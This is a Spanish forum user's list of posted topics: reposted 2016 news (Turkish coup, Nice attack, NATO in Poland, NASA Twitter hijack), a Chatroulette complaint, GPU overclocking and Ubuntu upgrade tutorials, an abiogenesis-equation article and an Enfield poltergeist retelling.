Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - El_Andaluz

#1936



"El intento de golpe ha fracasado. Casi ha terminado. El golpe está siendo rechazado, pero hay algunos (rebeldes) que resisten. A partir de mañana los responsables del intento serán juzgados por traidores", ha anunciado Nuh Yilmaz, subsecretario de prensa del Servicio de Inteligencia de Turquía (MIT).

Según la emisora NTV, Hulusi Akar, el jefe del Estado Mayor del que se informó había sido capturado por los rebeldes, ha sido liberado.

Además, los tanques que habían tomado posiciones frente al aeropuerto Atatürk de Estambul, el más importante de Turquía, se han retirado, así como los soldados que custodiaban las instalaciones.

El aeropuerto ha sido tomado por la Policía y por cientos de civiles. También se ha informado de que un caza ha derribado uno de los helicópteros rebeldes.

Los medios informan también de que un grupo de militares golpistas que habían ocupado uno de los puentes sobre el Bósforo en Estambul han sido conminados a rendirse.

La televisión privada turca NTV ha emitido imágenes de soldados golpistas desarmados y arrestados por la policía, en lo que parece una señal de que el golpe militar iniciado esta noche ha fracasado.

El jefe de prensa de los servicios secretos, Nuh Yilmaz, ha declarado que el golpe ha sido rechazado y los militares alzados están siendo vencidos. La policía ya se ha apoderado de los puntos estratégicos, añadió, y la situación está volviendo lentamente a la normalidad.

Esta información llega el mismo tiempo que se conoce que varias personas han resultado heridas al ser bombardeado por un avión el edificio del Parlamento turco, en Ankara.

Por su parte, la televisión pública turca TRT ha vuelto a emitir con normalidad después de que los soldados que habían tomado su sede central en Ankara abandonaran el lugar.


Por que ha sido una minoría de militares, si no hubiera sido peor para que luego digan que Turquía es un país seguro.

Por cierto que raro que hayan dado un golpe de estado antes Turquía que en Venezuela que estar peor la cosa.

http://es.euronews.com/2016/07/16/militares-turcos-bloquean-el-puente-sobre-el-bosforo-en-estambul-hay-tanques-en/
#1937
Unos ocho meses después de los atentados terroristas en París, los peores en la historia de Francia, un ataque con un camión dirigido hacia una multitud dejó al menos 77 muertos en Niza.

Un cuerpo yace en el pavimento luego de que un camión embistió a una multitud en la localidad costera de Niza, Francia.

En la mañana de este jueves, el presidente Francois Hollande anunció que levantaría el 26 de julio el estado de emergencia que estaba en vigor en Francia tras los atentados que dejaron 130 muertos en París en noviembre del año pasado.

"No podemos prolongar el estado de emergencia por siempre. No tiene sentido. Eso significaría que ya no somos una república con leyes que pueden ser aplicadas bajo toda circunstancia", aseguró Hollande desde Avignon, en el sur francés, citado por France 24.

Era el Día de la Bastilla la fiesta nacional de Francia, y su tono era optimista. "Tuvimos que extender el estado de emergencia hasta estar seguros de que la ley nos da los medios para contrarrestar efectivamente amenazas terroristas", dijo Hollande.

Pero horas después, en la noche, un atacante embestía con un camión y disparaba hacia una multitud que celebraba esta fecha escuchando grupos musicales en el Paseo de los Ingleses en la costera Niza. El ataque ha dejado hasta ahora al menos 77 muertos, confirmó Hollande.

El mandatario habló tras regresar de inmediato a París para liderar una reunión ministerial de emergencia. Tal y como ocurrió la noche del 13 de noviembre del 2015, cuando ataques terroristas simultáneos en distintos puntos de la capital francesa se convirtieron en los más mortales que haya sufrido la nación europea.

El Estadio de Francia, el cruce de las calles Bichat y Alibert –entre el bar Le Carrillon y la acera del restaurante Le Petit Cambodge–, el bar La Belle Equipe, el Boulevard Voltaire y el teatro Le Bataclan fueron sacudidos por terroristas que dispararon a diestra y siniestra. Algunos se hicieron explotar en medio de la confusión.

Esos ataques fueron reivindicados por el grupo Estado Islámico (conocido también como ISIS), como represalia por la política antiterrorista del país miembro de la OTAN.

Siete ataques en 18 meses

Meses antes, el 7 de enero, otro atentado sembró el terror en París. Dos hermanos que se identificaron como yihadistas irrumpieron en la redacción de la revista Charlie Hebdo y acribillaron a 11 personas. Habían tomado como rehén a la caricaturista Corinne Rey, conocida como Coco, y la condujeron hasta la sede de la publicación, donde abrieron fuego.




Vuelven los locos.

http://www.univision.com/noticias/ataque-en-niza/francia-sin-tregua-nuevo-ataque-en-el-dia-de-su-fiesta-nacional
#1938
Bueno el otro día me dijeron una pagina para conocer gente de todo los países se supone que chicas también aunque menos, el otro día mire por curiosidad y es un chat aleatorio que se conecta solo osea que no puedes tu elegir con quien puede hablar y la sorpresa que me llevo es que puedes poner cam para que te vean y ellos a ti pero salen siempre tío haciéndose pajillas, gente con los huevos atados con una cuerda  :o se supone que es un chat para conocer gente no para exhibirse creo que lo pones en las normas. :xD


CitarBeneficios de usar Chatroulette

Este sítio tiene numerosos propósitos y gente con tipo de estilos de vida que disfrutan usándolo. Da igual si estás buscando al único, y definitivo amor de tu vida, o simplemente deseas hacer nuevos amigos; Chatroulette.es es el mejor lugar para hacerlo. Con miles de usuarios a cualquier hora del día, serás capaz de encontrar al alguien con quien poder hacer "clic". Además de eso, la posibilidad de ver únicamente cámaras de chicas, hacen de este sitio el lugar adecuado para hombres heterosexuales y lesbianas. No tendrás que ver ni siquiera a un sólo hombre, ya que puedes elegir navegar exclusivamente entre cámaras de usuarios femeninos. Incluso no tienes que pagar por esta opción; Tan sólo necesitas verificar tu edad, ya que en esta sección se muestra contenido adulto.

Según las normas no pueden entrar tampoco menores de edad pero eso creo que se lo saltan por que había algunos menores o gente haciendose pasar por menor de edad no conozco muy bien la pagina solo vi por encima no se si peligroso el sitio en el sentido de que te puedan grabar o cualquier cosa.

Consejos útiles

Aprender como usar los sitios tipo Chatroulette es una forma de arte. El hecho de conocer gran cantidad de tipos diferentes de personas en cortos espacios de tiempo, convierte en importante el usar ciertas técnicas a fin de atraer gente a tu webcam antes de que le den al botón "siguiente". Aquí hay algunos consejos útiles para comenzar.

Mantener las formas y actuar con educación es importante si deseas que los extraños te hagan caso.
Mantén tu ropa puesta para evitar que los usuarios se asusten por tu estilo.
Enciende una luz para que el otro usuario pueda verte. Nadie quiere ver una webcam oscura.
Pon algo de música de fondo para evitar incómodos silencios.

Asegúrate de que tu webcam está siempre enfocada.

Lo que si me he quedado flipado, es que hay personas que no ponen Cam haciéndose pasar por menor de edad y luego cuando te ponen la Cam es un tío no se con que propósito la verdad no se si la pagina es mucho de fiar.

Perdonar si no esta en el sitio adecuado si alguien le interesa mirar la pagina y probar podréis comprobar lo que os digo.

Según las advertencias:

Citar¡Advertencia: este sitio es solo para personas Adultas de +18!
Al usar este sitio estás de acuerdo con nuestros términos de servicio.
Advertencia: Si transmite contenidos relacionados con menores o cualquier otro tipo de contenido ilegal será reportado a las autoridades y podrá ser arrestado o perseguido.


http://chatroulette.es/
#1939
La OTAN desplegará cuatro batallones multinacionales en Polonia, Estonia, Letonia y Lituania e impulsará una brigada en Rumanía.




El presidente de EE.UU., Barack Obama, anunció este viernes que su Gobierno enviará 1.000 soldados a Polonia, dentro del proyecto de la OTAN de establecer cuatro batallones en territorio polaco y las repúblicas bálticas exsoviéticas para reforzar militarmente su flanco oriental ante Rusia. "Puedo anunciar que Estados Unidos será la nación líder para la presencia de la OTAN aquí, en Polonia", dijo Obama a los periodistas después de reunirse con su homólogo polaco, Andrzej Duda. "Eso significa que Estados Unidos desplegará un batallón con alrededor de 1.000 soldados estadounidenses aquí en Polonia en régimen de rotación, para trabajar hombro con hombro con los soldados polacos", agregó.

El anuncio se enmarca en el acuerdo que cierra este viernes la OTAN para desplegar cuatro "batallones multinacionales reforzados", sobre una base rotatoria, en Polonia, Estonia, Letonia y Lituania, e impulsar una brigada multinacional en Rumanía.

Según fuentes aliadas, los primeros de los alrededor de 4.000 efectivos que compondrán esos batallones se desplegarán a principios del año próximo, aunque la Casa Blanca informó en un comunicado de que el despliegue estadounidense podría comenzar este mismo año fiscal, que termina en septiembre.

Además, Estados Unidos también "posicionará los equipos para una segunda brigada blindada de combate" que rotará por Europa con sede en Polonia, precisó la Casa Blanca. "En otras palabras, Polonia verá un aumento en el personal estadounidense y de la OTAN y también de los equipos militares más modernos", aseguró Obama, y recordó que ya existe una presencia de la Fuerza Aérea de Estados Unidos en la base aérea polaca de Lask.

La formación de los batallones está liderada por Estados Unidos, Canadá, Alemania y el Reino Unido, país este último que ya ha anunciado que enviará 500 soldados a Estonia y 150 a Polonia.

El presidente polaco aseguró tras su encuentro con Obama que "Polonia está muy satisfecha con el hecho de que Estados Unidos apoye firmemente el fortalecimiento de la estructura militar de la OTAN en el flanco oriental de la Alianza". "La seguridad está donde está presente el ejército más fuerte del mundo, y el ejército más fuerte del mundo es, hoy por hoy, el Ejército de los Estados Unidos", subrayó Duda.

Obama destacó que Polonia es "uno de los pilares del flanco oriental de la OTAN" y elogió la participación polaca en el sistema de defensa antimisiles contra posibles ataques balísticos desde Irán. El líder estadounidense añadió que Estados Unidos está "oficialmente obligado a cumplir con el punto 5 (del tratado de la OTAN), lo que significa la defensa mutua". "Esto no sólo significa palabras, sino que también se debe materializar en hechos", subrayó Obama.

El mandatario agradeció además a Polonia sus esfuerzos en defensa de la soberanía y la integridad territorial de Ucrania "frente a la agresión rusa". Obama hizo hincapié en que es importante que Ucrania reciba ayuda para reforzar su fuerza militar, estabilidad política y económica. Por su parte, Duda confió en que, a pesar del Brexit, el Reino Unido "continúe totalmente integrado en el marco de la OTAN".


http://www.lavanguardia.com/internacional/20160708/403057661541/obama-1000-soldados-batallon-otan-rusia-polonia.html
#1940
El principal objetivo de este joven de 24 años es "defender el santuario de los musulmanes chiíes" de los ataques extremistas.



Dice el refrán que las comparaciones son odiosas, pero en este caso resulta imposible ver las imágenes y no acordarse del superhéroe de Marvel. Hulk se ha convertido en el 'alter ego' de este joven iraní de 24 años que no para de acumular seguidores en Instagram por su gigantesco físico. Sajad Gharibi fue descubierto por casualidad por un internauta y, después de advertirle de su parecido con el personaje de cómic, en pocos días ha llegado a los 135.000 fans en su citada red social: todo el mundo quiere conocer al denominado "Hulk persa".


A pesar del apodo con que se le ha bautizado, Sajad prefiere el alias de "Hércules de Persia". Así lo expone en su cuenta de Instagram, donde también informa del peso de su abultada fisionomía: nada menos que 155 kilos componen la pura fibra de la que presume en sus fotos. En algunas de las imágenes, Gharibi incluso llega a realizar montajes donde aparece pintado de verde como si realmente se hubiera convertido en el personaje de Marvel –Hulk– con quien le comparan.


En los últimos días, Sajad ha informado de que se unirá a las tropas de Al Assad en Siria para combatir al ISIS. "Quiero defender del ISIS y otros atacantes el santuario de los musulmanes chiíes en Siria", confesó el joven iraní a la BBC. Su gran tamaño y su oposición al terrorismo yihadista avivó el rumor de que había sido Gharibi quien había terminado con la vida de 'La Topadora' –el verdugo extremista famoso por sus crueles métodos de ejecución–. Sin embargo, el joven iraní desmintió esta información.



Sajad presume de poder levantar 175 kilos de una vez, una cifra 20 kilos superior a su propio peso. Su truco está en el entrenamiento diario y en llevar una cuidada alimentación a base de alimentos que potencian su musculatura. Una cuidada apariencia de la que sus miles de seguidores dan cuenta cada vez que él mismo sube una foto en múltiples poses: 'vestido' con la bandera de Irán, levantando pesas o comprando una sana piña que en sus manos parece minúscula.



http://www.elconfidencial.com/mundo/2016-07-06/sajad-gharibi-hulk-hercules-persia-isis_1228016/

Yo no es por nada, pero el tal "Hercules de Persia" como lo apodan en Iran puede acabar igual que en la batalla de las termopilas arrojado por un barranco y con la cabeza cortada. :xD


#1941
1: Las claves del overclocking

En los últimos meses hemos vísto cómo se han lanzado nuevos juegos que suben el nivel técnico un escalón más. Rise of the Tomb Raider, Quantum Break, Doom, Dark Souls III, Total Warhammer son títulos que aunque no exigen un ordenador de la NASA para disfrutar de buenos gráficos, necesitas una buena tarjeta gráfica para jugar con los gráficos en calidad Ultra.

Tanto las GPUs como las CPUs funcionan a cierta velocidad, pero se pueden overclockear, es decir, aumentar su velocidad de reloj y con ello su rendimiento, porque se fabrican con unos márgenes de seguridad amplios. Pero el overclocking tiene unos límites, y si no lo haces bien puedes estropear el hardware. En este tutorial vamos a explicar uno de los métodos más básicos y seguros para realizar overclocking a la tarjeta gráfica. Obtendrás una mejora de rendimiento en torno al 10%, ganando un puñado de fps que hará que los juegos vayan más suaves, o puedas subir un nivel de calidad extra en los efectos gráficos.

¿Qué es el overclocking?

El rendimiento de cualquier hardware está limitado por dos barreras físicas: el consumo de energía y el calor. Como más rápido sea un chip más consume y más calor genera. En un PC de sobremesa la energía no es problema porque puedes instalar una fuente de alimentación potente y obtener energía infinita de cualquier enchufe. El gran problema es el calor, y el desgaste asociado. Puedes aumentar la velocidad de la CPU o la tarjeta gráfica si tu fuente de alimentación puede proporcionar los vatios suficientes, y el sistema de refrigeración enfría con holgura.

En el caso de las tarjetas gráficas hay que tener en cuenta que a veces ya vienen overclockeadas de fábrica, así que no se pueden mejorar mucho más. Comprueba en la documentación para saber si la tuya ya lo está. Las tarjetas con overclocking suelen tener en su nombre la coletilla OC o Extreme. Éstas no hay que tocarlas.

En este tutorial vamos a mostrar el método de overclocking de la placa gráfica más sencillo y seguro. Existen métodos más radicales, como el cambio de voltaje, uso de BIOS alternativas o la refrigeración con nitrógeno líquido, pero son más delicados y pueden estropear la tarjeta gráfica si no lo haces bien, así que vamos a obviarlos.

NOTA IMPORTANTE: Hacer overclocking sin control puede estropear la tarjeta gráfica o la placa base. El método que vamos a explicar aquí es seguro si se sigue al pie de la letra, pero depende de la estabilidad de cada PC. Usa el software de este tutorial bajo tu propia responsabilidad. No nos hacemos responsables de ningún fallo o problema ocasionado por su uso.

2: El software

El método para overclockear una tarjeta gráfica consiste en subir manualmente la velocidad de la GPU y la memoria gráfica, por medio de un programa.

Algunos fabricantes de tarjetas ofrecen aplicaciones oficiales para hacerlo. Por ejemplo, Gaming App de MSI permite aplicar overclocking (OC) a sus placas, subiendo la velocidad de la GPU y la memoria hasta un límite seguro:


Comprueba si tu tarjeta dispone de un software que permite hacer overclocking automático. Si es así, úsalo en vez del OC manual que vamos a explicar a continuación. Si quieres probar el modo manual entonces no apliques el OC oficial, deja el modo Gaming o el modo normal de funcionamiento.

Para mejorar el rendimiento de la tarjeta gráfica necesitamos dos programas diferentes. Por un lado un software que nos permita alterar la velocidad de reloj, y por otro un benchmark que mida su rendimiento en tiempo real y nos muestre si nos hemos pasado con el overclocking.

Existes muchos programas para realizar ambas tareas. Para alterar la velocidad puedes usar EVGA PrecisionX 16 o MSI Afterburner. Si tienes una tarjeta AMD no necesitas programas adicionales porque el driver Catalyst incluye opciones de overclocking:


Necesitamos también un benchmark que pondrá a funcionar la tarjeta a máximo rendimiento para comprobar si sigue estable tras overclockear. Algunos de los más utilizados son Heaven Benchmark, Valley Benchmark o MSI Kombustor.

Nosotros vamos a usar Heaven Benchmark y MSI Afterburner en una placa NVIDIA GTX 970 pero con cualquier otro el proceso es el mismo.

3: Overclockeando

En primer lugar, comprueba que tienes una fuente de alimentación adecuada para que soporte la tarjeta gráfica funcionando al máximo. En este enlace están las fuentes de alimentación recomendadas (medidas en vatios) para las tarjetas gráficas más populares.

Descarga y pon en marcha el programa GPU-Z. Esta aplicación te dice cual es la velocidad de reloj de la GPU (GPU Clock) y la velocidad de memoria de tu tarjeta gráfica (Memory):


Estos son los valores de partida que vamos a aumentar.

Pon en marcha Heaven Benchmark. Configura todas las opciones en Ultra con DirectX11 y la resolución máxima de tu monitor:


Pulsa el botón RUN y luego la tecla F9 para realidad un chequeo de rendimiento. Apunta el valor de FPS que mostrará al final.

NOTA IMPORTANTE: Hacer overclocking sin control puede estropear la tarjeta gráfica o la placa base. El método que vamos a explicar aquí es seguro si se sigue al pie de la letra, pero depende de la estabilidad de cada PC. Usa el software de este tutorial bajo tu propia responsabilidad. No nos hacemos responsables de ningún fallo o problema ocasionado por su uso.

Pon en marcha MSI Afterburner. Aunque lleva la marca del fabricante MSI funciona con todas las tarjetas gráficas, pues es un software independiente adquirido por dicho fabricante:


Como puedes ver, este software permite alterar el voltaje (Core Voltage), el consumo máximo (Power Limit), la velocidad de reloj de la GPU (Core Clock) y la velocidad de la memoria (Memory Clock). Asegúrate de que en la casilla Velocidad del Ventilador (Fan Speed) está marcado el valor Auto.

En la ventana de la derecha puedes ver las gráficas de Consumo, Temperatura y Carga de la GPU, entre otras.

Pon en marcha Heaven Benchmark pero ahora ponle una resolución más baja que tu monitor (por ejemplo 720p si tienes 1080p) y desmarca la casilla Full Screen para que se muestre en una ventana. Pulsa RUN y la tecla F9 para que comience la prueba de rendimiento. Debes ver en pantalla las ventanas de Afterburner y Heaven Benchmark al mismo tiempo:


La gráfica en rojo es la temperatura. Comprueba que nunca supera los 82 grados centígrados.

Comienza subiendo el deslizador Memory Clock un total de 10 MHz (debe aparecer +10) y pulsa el botón Apply. Mira la ventana de Heaven Benchmark y comprueba que no aparecen fallos gráficos: tramas de caracteres, columnas blancas, cuadrados, etc. Algunos fallos típicos de memoria gráfica son éstos:


Si no ves fallos, aumenta 10 Mhz más el valor Memory Clock (y pulsa Apply) y vuelve a comprobar si surgen fallos. Si todo es correcto ve aumentando de 10 en 10 hasta que aparezcan los primeros fallos. Ten en cuenta que la memoria se puede aumentar sin problemas 200 o 300 Mhz. En cuando veas el primer fallo, baja el valor 10 o 20 Mhz hasta el anterior que funcionaba bien.

Durante el proceso es posible que alguna vez el ordenador se bloquee o haga un reset. Es normal, se trata de una medida de seguridad para prevenir fallos. Si ocurre baja 10 o 20 Mhz y quédate ahí.

Una vez fijada la memoria, vamos con la velocidad de reloj de la GPU. El proceso es el mismo: Mueve la barra Core Clock 10 Mhz a la derecha, pulsa el botón Apply y comprueba que no aparecen fallos en la ventana del benchmark. Sigue subiendo de 10 en 10 hasta que aparezcan los primeros errores. Suelen ser cuadrados, luces brillantes, u objetos mal dibujados:


Si ocurre, baja la barra de Core Clock 10 o 20 Mhz, y déjalo ahí. En la mayoría de las tarjetas la velocidad de la GPU se puede aumentar 100 o 150 Mhz manteniendo la seguridad.

Si por alguna razón te arrepientes, la temperatura supera los 80 grados, o quieres dejar todo como estaba antes del overclocking, simplemente pulsa el botón Reset en la parte inferior de MSI Afterburner y se recuperarán los valores de velocidad normales.


4: Las pruebas finales

Pon en marcha el programa GPU-Z y comprueba que los nuevos valores de reloj están activos. Debe mostrar valores más altos que el campo Default:


Ejecuta Heaven Benchmark o cualquier otro y déjalo funcionando un rato con los valores al máximo para asegurarte de que el ordenador es estable, no se muestran fallos gráficos ni reseteos.

Si todo ha ido bien, podrás ganar entre 5 y 10 fps en la mayoria de los juegos:

Y eso sin tocar el consumo (Power Limit), que algunos usuarios suben al 110%, ni el voltaje, que es aún más efectivo pero más peligroso.

Ten en cuenta, eso sí, que overclockear la tarjeta gráfica puede acelerar su desgaste, aunque en este tutorial nos hemos mantenido dentro de los márgenes de seguridad y este desgaste será casi inapreciable si se mantiene uan buena refrigeración del equipo.

5: ¿Overclocking fallido? Mejora el hardware

Es posible que al poner en marcha el overclocking descubras que tu ordenador no es capaz de aguantar ni siquiera un mínimo aumento de velocidad. Es un indicio de que tu fuente de alimentación y tu sistema de refrigeración van muy justos.

Pon una fuente de alimentación más potente y añade ventiladores de más calidad a la caja del PC o la placa gráfica. Así podrás overclockear sin ningún problema, al menos en los niveles más básicos.

Es una operación que requiere paciencia y atención, pero si vas paso a paso es bastante seguro y notarás una mejora real de rendimiento en los juegos.

AUTOR: Juan Antonio Pascual
#1942
Pese a ser un sistema operativo de código abierto, Ubuntu suele actualizarse con regularidad. Actualmente su última versión es la 16.04 LTS o long term service. Puede actualizar a ella desde la terminal con un sencillo comando o hacer una instalación limpia de este SO basado en el proyecto Linux.


1: Comprueba qué versión tienes instalada

Al igual que otros sistemas operativos, Ubuntu cuenta con varias versiones de firmware. Lo habitual es que, en su numeración, vaya saltando de dos en dos. Es decir, la última versión de Ubuntu disponible es la 16.04 LTS, que sucede a la 14.04 LTS.

Con LTS se hace referencia a long term service, o lo que es lo mismo: una versión del sistema que dispondrá de actualizaciones constantes durante un largo período de tiempo. A la hora de descargar su última versión desde la web, Ubuntu especificará exactamente hasta cuándo dispondrás de estas actualizaciones.

El primer paso antes de actualizar Ubuntu es comprobar qué versión del sistema operativo basado en Linux tienes instalada, pues no todas podrán actualizarse a la última versión. Para saberlo debes ir a los Ajustes del Sistema y seleccionar Detalles.




2: Activa el asistente de actualización


Para activar la actualización de Ubuntu a su última versión no tienes que recurrir a la terminal y los comandos, o al menos no necesariamente. Puedes acceder desde el buscador de Ubuntu introduciendo la palabra Software. Uno de los resultados que ofrecerá es el de Actualización de Software

Si lo ejecutas, comprobará de forma automática si hay nuevas versiones de software para tu equipo. Esto implica no sólo la actualización del sistema operativo Ubuntu su última versión, sino mejoras menores en todos los paquetes del sistema.


Puede que no encuentre nada. En ese caso, estás al día, pero si corres el asistente ocasionalmente, lo normal es que encuentre al menos algunos paquetes que necesitan actualización. La actualización a la última versión del sistema no es obligatoria, pero te avisará cuando esté disponible por si quieres instalarla.


Si eliges pasarte a la última edición LTS de Ubuntu, el asistente se ejecutará y tardará un tiempo en finalizar el proceso. Una vez lo haga, reiniciará tu PC de forma automática.

Lo positivo de esta forma de actualizar Ubuntu es que no perderás ningún archivo, aunque por lo que pueda pasar es recomendable hacer una copia de seguridad de los ficheros que te sean más preciados.


3: Una instalación limpia de la última versión de Ubuntu

Si, por el contrario, quieres instalar Ubuntu desde cero y borrando todos tus archivos, también puedes hacerlo. En primer lugar debes acceder a la web oficial de Ubuntu, desde donde puedes descargar la última versión del sistema disponible.

Una vez tengas el archivo .iso en tu ordenador, la herramienta que te lo hará todo más fácil es el Creador de discos de arranque, programa preinstalado en la mayoría de las distros de Ubuntu.

Si lo abres teniendo un pendrive insertado en alguno de los puertos USB de tu PC, lo detectará automáticamente. Hará lo mismo con el .iso del sistema operativo Ubuntu.

El siguiente paso es crear el USB booteable con la última versión de Ubuntu, un proceso que se tomará unos minutos para completarse. Después sólo resta instalar Ubuntu de la misma forma que lo hiciste en la anterior ocasión.


AUTOR: Eduardo Álvarez
#1943
La cuenta de Twitter del laboratorio Kepler fue intervenida de un modo que logró burlas en todo el mundo.


Un grupo de hackers hizo una broma muy pesada a los community managers de la NASA al cambiar los tuits informativos de la cuenta del telescopio Kepler por fotos de mujeres desnudas.

El Laboratorio Espacial Kepler es un satélite que se encarga de buscar planetas en la Vía Láctea que se encuentren en zonas habitables alrededor de sus estrellas respectivas. En mayo anunció el hallazgo de 1.248 nuevos planetas, sin embargo, una publicación en su Twitter nunca logró tanta repercusión mundial como la publicación de esta imagen de un trasero femenino.


Luego, autoridades de la agencia espacial estadounidense informaron que habían recuperado el control de la cuenta y que se encontraban investigando cómo ocurrió este ataque.

Lo cierto es que la fotografía casi pornográfica apareció incluso en la web de la NASA, gracias a un widget que muestra su reciente actividad en Twitter.

http://www.infobae.com/america/eeuu/2016/07/06/ataque-hacker-a-la-nasa-cambiaron-fotos-de-planetas-por-desnudos/
#1944
Investigadores del Centro de Astrobiología de Columbia y la Universidad de Glasgow han formulado con qué frecuencia se inicia la vida en otros planetas.



Investigadores del Centro de Astrobiología de Columbia y la Universidad de Glasgow han formulado una ecuación matemática para estimar con qué frecuencia se inicia la vida en otros planetas. En su artículo publicado en la revista Proceedings de la Academia Nacional de Ciencias, Caleb Scharf y Leroy Cronin describen su ecuación, cómo se les ocurrió y por qué creen que podría llegar a ser útil para que los científicos aprendan más acerca de la verdadera naturaleza de otros planetas y el sistema solar.

En la década de 1960, un astrónomo llamado Frank Drake publicó una fórmula para estimar el número de civilizaciones extraterrestres que podrían ser capaces de transmitir señales de radio en una forma reconocible para los receptores aquí en la Tierra.

La Ecuación de Drake ha sido el estándar no oficial durante medio siglo, a pesar de no tener ninguna solución, debido a que no hay resolución para algunos de los parámetros, todavía desconocidos. Lo mismo es válido para la nueva ecuación desarrollada por Scharf y Cronin, pero resolver sus incógnitas por descubrir ofrecería un tipo diferente de respuesta al que Drake estaba buscando.

La fórmula

Para construir su fórmula, el dúo tuvo en cuenta varios parámetros para estimar la abiogénesis, que es la probabilidad de que ocurra un evento que lleve a la vida, incluyendo el número de bloques de construcción de la vida viables, el número medio de tales bloques por organismo, la disponibilidad de los bloques de construcción que pudieran existir durante un período de tiempo, expresada como una fracción, y la probabilidad de que la existencia de bloques de construcción llevaría en realidad a la vida a partir de una determinada unidad de tiempo.

Se ve así: N abiogenesis (t) = Nb · 1 / n · fc · Pa · t

En esencia, la fórmula pretende sugerir que la probabilidad de que la vida comience en un determinado planeta está conectada muy probablemente a si hay bloques de construcción disponibles y la cantidad de ellos que pudiera haber. A medida que más se aprenda sobre el espacio, los investigadores esperan que la fórmula podría ayudar a reducir los objetivos de búsqueda, ofreciendo una probabilidad estadística de éxito para un determinado planeta.

Los investigadores hacen notar que los bloques de construcción disponibles no necesariamente tienen que ser como los que llevaron a la vida en nuestro planeta al principio. Sugieren que lo implícito en la fórmula es la probabilidad de que los acontecimientos de inicio de la vida son más probables que ocurran en los sistemas solares donde hay múltiples planetas, que proporcionan la posibilidad de compartir los materiales que podrían conducir a bloques de construcción de la vida.



http://www.lavanguardia.com/vida/20160705/402986337801/una-ecuacion-matematica-estima-si-hay-vida-en-otros-planetas.html


¿Alguien sabe aplicar esta formula para ver la probabilidad de vida en otros planetas?
#1945
Dejo aquí un vídeo documental por Cuarto Milenio y la historia cogida de otra fuente






Una familia del norte de Londres, más concretamente del barrio de Enfield, denunció, en 1977 una serie de sucesos paranormales que estaban sucediendo en su casa. Durante la noche, las dos hijas de la familia sufrieron movimientos de sillas, cortinas, almohadas o posesiones en su habitación. Este caso estalló en los medios de comunicación de la época pero, ¿fue realidad o tan solo un montaje? Pongámonos en situación.

A finales de Agosto de 1977, en la barriada de Enfield, Londres, una familia compuesta por una madre separada, Peggy Hodgson de 40 años y sus cuatro hijos, Margaret de 13 años, Janet de 11 años, Johnny de 10 años y Billy de 7 años, comenzó a vivir unos extraños e inexplicables sucesos, aparentemente paranormales. Lo que al principio parecía unas simples pesadillas por parte de las niñas, acabó siendo el caso mejor documentado sobre el tema de casas encantadas. Miles de clips de vídeo, grabaciones de audio y centenares de fotografías y numerosos testigos avalan este caso.

El Caso

Fase 1

La historia cuenta como una noche, Peggy se despertó alarmada por los gritos de sus hijas, al ir corriendo a la habitación, las niñas asustadas y entre sollozos decían que había alguien con ellas que les movía sus camas. Peggy pensando que habían tenido pesadillas, prácticamente nos les hizo caso, aunque se quedó con ellas hasta que se durmieron. A la noche siguiente, todo volvió a repetirse y cuando la mujer volvía a su habitación, oyó como un mueble era arrastrado en la habitación de las niñas.


Al regresar vio como un baúl estaba en mitad de la estancia. Pensando que sus hijas lo habían movido, decidió ponerlo en sus sitio, hasta que se dió cuenta de que casi ella no era capaz de volverlo a colocar en su lugar. Tras tapar a su hijas, de camino a su cama, volvió a oír el baúl siendo arrastrado por la habitación. Corrió hacia ella mientras que algo aporreaba las paredes de la habitación. Cogió a sus cuatro hijos, los llevó a la planta baja de la casa y pidió ayuda a los vecinos, Vic y Peggy Nottingham. Mientras que la asustada madre llamaba a la policía, Vic empezó a investigar la vivienda. En una entrevista Vic declaró –"Me fui de allí y yo no podía distinguir esos ruidos – hubo unos golpes en la pared, en el dormitorio, en el techo. Me estaba empezando a asustar." -Daily Mail Online.

Parte de la familia Hogdson, de dcha a izq, Penny, Johnny, Margaret y Janet


Los agentes de policía, que no tardaron en llegar, registraron la vivienda, con la mente puesta en que era una travesura de los niños, hasta que vieron por sus propios ojos como una silla se movía sola por la casa. Esas son las  palabras que escribieron en la declaración firmada por los agentes.

Al día siguiente, la familia se encontraba acompañada de los Nottingham cuando los juguetes de los niños empiezan a salir volando por su habitación. Es entonces cuando viendo que la policía no les podía ayudar, ya que en la vivienda no se estaba cometiendo ningún delito, deciden acudir al The Daily Mirror. El periódico envía a un veterano redactor, George Fallows, a un fotógrafo, Graham Morris, y a un reportero, Douglas Bence. Después de estar en el interior de la casa durante varias horas sin que sucediera nada, los reporteros decidieron marcharse pero cuando casi estaban en su coche la madre sale de la casa llamándolos. Al regresar a la vivienda pudieron observar personalmente el fenómeno, es más, una pieza de Lego golpeó en la frente del fotógrafo mientras intentaba tomar unas fotografías. Cuando el fotógrafo reveló el carrete, se percató de que la foto de ese momento tenía un agujero. En ese momento, George Fallows llamó a la SPR (Sociedad para la Investigacion Psiquica) que inmediatamente mandó a Maurice Grosse.


Agentes que acudieron a la llamada de Penny


El 5 de septiembre, una semana después de que comenzaran los fenómenos, Grosse llegó a la casa, pero durante los días siguientes no ocurrió nada fuera de lo común. Fue el 8 de septiembre, mientras que Grosse y los periodistas vigilaban la casa cuando algo ocurrió. Entre las 10 y las 11 de la noche, oyeron un fuerte golpe en el dormitorio de las niñas. Al subir descubrieron que una silla en la habitación estaba suspendida en el aire a una altura de unos cuatro pies, a los pocos segundos, la silla cayó y despertó a Janet que se encontraba dormida. Una hora más tarde volvió a suceder y esta vez el fotógrafo Morris estaba preparado para capturar el acontecimiento en su cámara. Grosse experimentó en ese momento varios sucesos paranormales, vio como las puertas se abrieron solas, sintió una fría brisa recorrer su cuerpo y uno de los juguetes voló sin que nadie, aparentemente, lo lanzara.

Fase 2

Cinco días más tarde, el 10 de septiembre, el caso del poltergeist de Enfield salió en la primera página del periódico Daily Mirror y pronto la radio LBC de Londres se hizo eco de la noticia. Esa misma tarde, Grosse, la señora Harper y sus vecinos participaron en un programa de TV.


Los fenómenos a partir de ese día empeoraron. Habían interferencias en los sistemas eléctricos de la casa, los objetos desaparecían y aparecían inexplicablemente horas después, las grabaciones de los reporteros de la BBC se borraban misteriosamente, una cámara de infrarrojos instalada en secreto en el dormitorio de las niñas apareció completamente rota.

muebles caidos tras fenomeno
Muebles caidos tras ser lanzados por el ente invisible
Grosse pronto unió a la investigación al escritor Guy Lyon Playfair y los dos


Sillas moviendose sin explicación aparente

